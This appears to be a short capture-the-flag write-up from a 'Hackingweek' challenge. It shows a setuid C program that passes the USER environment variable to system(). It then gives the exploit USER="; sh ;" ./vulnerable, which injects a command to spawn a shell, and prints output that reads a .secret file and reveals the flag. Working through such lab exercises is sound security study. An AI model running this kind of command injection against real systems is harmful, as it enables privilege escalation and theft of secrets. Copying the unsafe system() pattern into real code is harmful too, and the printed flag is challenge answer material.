Hackingweek — Exploit 1

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int
main()
{
  char *buffer = NULL;
  gid_t gid = getegid();
  uid_t uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  asprintf(&buffer, "/bin/echo %s is using this program!", getenv("USER"));
  system(buffer);

  return EXIT_SUCCESS;
}

The interesting part is line 17 (the asprintf() call): the “USER” environment variable is concatenated into a string that is then passed to system(). If we insert a ;, the echo command only prints a newline, and the next word is interpreted as a command. We call sh, since bash drops privileges.

exploit01@ns314076:/home/exploit01/project$ USER="; sh ;" ./vulnerable

sh-4.2$ whoami
exploit01
sh-4.2$ cat /home/exploit01/.secret
raht6ae1Ue